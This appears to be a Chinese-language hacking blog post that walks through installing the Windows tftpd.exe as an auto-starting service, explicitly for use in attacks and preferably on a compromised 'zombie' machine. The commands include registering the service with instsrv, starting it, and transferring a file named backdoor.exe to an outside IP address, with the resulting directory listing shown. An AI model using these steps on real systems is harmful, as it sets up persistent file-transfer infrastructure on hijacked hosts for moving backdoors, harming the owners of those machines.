建一個TFTP服務器

穩萊

建一個TFTP服務器

我們在攻擊的過程中經常要使用到tftp服務器,如果你不方便在你的機器上安裝tftp服務器,那麼可以在肉雞上安裝,這是比較好的方法。
我們先來學習一下什麼叫作TFTP.
TFTP:(Trivial File Transfer Protocol). 小文件傳輸協議.
TFTP:是網絡應用程式,它比FTP簡單也比FTP功能少 ...

就記住這麼點基礎吧,學知識取精華是最重要的,如果你一定要學的很深的話,自己去看TCP/IP吧。

                        我們首先找到系統中的tftpd.exe文件,一般我們可以在%systemroot%\system32\dllcache目錄下找到該文件,建議把該文件copy到其他目錄。

C:\>copy %systemroot%\system32\dllcache\tftpd.exe
                        %systemroot%\system32
已復制 1 個文件。

我們會用Windows 2000下的Resource
                        Kits中的一個工具instsrv創建一個服務,instsrv的用法如下,當然,你也可以用其他的工具來實現(如srvinstw,GUI方式的)。

添加一個服務,注意,該服務創建侯為自動啟動。
C:\>instsrv tftp c:\winnt\system32\tftpd.exe
The service was successfuly added!

Make sure that you go into the Control Panel and use the Services applet to change the Account Name and Password that this newly installed service will use for its Security Context.

啟動服務
C:\>net start tftp
tftp 服務正在啟動 .
tftp 服務已經啟動成功。

測試服務是否正常工作
C:\>tftp -i 61.135.21.195 PUT backdoor.exe backdoor.exe
Transfer successful: 4209 bytes in 1 second, 4209
                        bytes/s

C:\>dir tftpdroot
驅動器 C 中的卷是 C
卷的序列號是 1E23-1907

C:\tftpdroot 的目錄

2001-09-22 01:14 <DIR> .
2001-09-22 01:14 <DIR> ..
2001-09-22 01:14 4,209 backdoor.exe
1 個文件 4,209 字節
2 個目錄 94,113,792 可用字節


注意,如果你上傳文件,系統會在%systemdrive%自動創建一個名為tftproot的目錄,OK,所有的工作已經完成了!

 

 給當前日誌評分:
Loading Vote
正在讀取評分資料...


文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: TFTP
相關日誌:

評論: 0 | 引用: 0 | 查看次數: -
發表評論
暱 稱:
密 碼: 遊客發言不需要密碼.
內 容:
驗證碼: 驗證碼
選 項:
雖然發表評論不用註冊,但是為了保護您的發言權,建議您註冊帳號.